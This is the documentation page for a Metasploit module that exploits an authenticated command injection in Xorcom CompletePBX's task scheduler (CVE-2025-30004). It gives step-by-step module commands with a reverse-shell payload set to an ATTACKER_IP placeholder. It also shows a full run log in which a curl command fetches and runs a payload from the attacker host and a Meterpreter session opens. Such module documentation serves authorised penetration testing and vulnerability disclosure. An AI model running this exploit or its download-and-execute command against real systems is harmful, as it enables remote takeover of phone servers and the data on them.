3.6 KiB
3.6 KiB
Vulnerable Application
This Metasploit module exploits an Authenticated Command Injection vulnerability in Xorcom CompletePBX <= 5.2.35. The issue resides in the task scheduler functionality, where user-controlled input is improperly sanitized, allowing arbitrary command execution with web server privileges.
Only the superadmin user (admin) has the necessary permissions to trigger this exploit.
Even when creating a new user with maximum privileges, the vulnerability does not work.
The vulnerability is identified as CVE-2025-30004.
Setup
Verification Steps
- Deploy a vulnerable instance of Xorcom CompletePBX <= 5.2.35.
- Launch Metasploit Framework.
- Use the module:
use exploit/linux/http/xorcom_completepbx_scheduler_rce
- Set the target host:
set RHOSTS [TARGET_IP]
- Set authentication credentials:
set USERNAME [VALID_ADMIN_USERNAME]
set PASSWORD [VALID_ADMIN_PASSWORD]
- Configure the payload:
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
set LHOST [ATTACKER_IP]
set LPORT [LISTENER_PORT]
- Execute the module:
run
- If successful, a Meterpreter session will be opened on the target.
Options
USERNAME
Admin username for authentication.
PASSWORD
Admin password for authentication.
Scenarios
Successful Exploitation Against a Vulnerable CompletePBX Instance
Setup:
- Target: Xorcom CompletePBX <= 5.2.35
- Attacker: Metasploit Framework instance
Steps:
msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.1.32/
[*] Command to run on remote host: curl -so ./HEuUpqtYDav http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./HEuUpqtYDav;./HEuUpqtYDav&
[*] Fetch handler listening on 192.168.1.36:8080
[*] HTTP server started
[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if the target is running CompletePBX...
[+] Detected CompletePBX on 192.168.1.32:80
[+] The target appears to be vulnerable.
[*] Attempting authentication with username: admin
[+] Authentication successful! Session ID: sid=697e43b483efc1ac316461cde1fbb5d470abc3b4
[*] Creating malicious scheduled task with description: Possimus quibusdam assumenda minima.
[+] Malicious task successfully created.
[*] Retrieving latest task ID for description: Possimus quibusdam assumenda minima....
[+] Found task with ID: 18
[*] Executing malicious task ID 18...
[*] Client 192.168.1.32 requested /LoPlnjEpeOexZNVppn6cAA
[*] Sending payload to 192.168.1.32 (curl/7.88.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.32
[+] Task executed successfully!
[*] Sending delete request (mode=delete) for task ID 18...
[*] Sending delete request (mode=deleteConfirmed) for task ID 18...
[+] Task 18 deleted successfully!
[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 192.168.1.32:40800) at 2025-07-16 21:11:31 +0200
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Debian 12.5 (Linux 6.1.0-20-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Impact
- This vulnerability grants remote code execution capabilities.
- Attackers can execute arbitrary commands as the web server user, potentially leading to full system compromise.
- Exploitation provides a Meterpreter session for post-exploitation activities.
This module is designed to demonstrate and automate the exploitation of this issue using the Metasploit framework.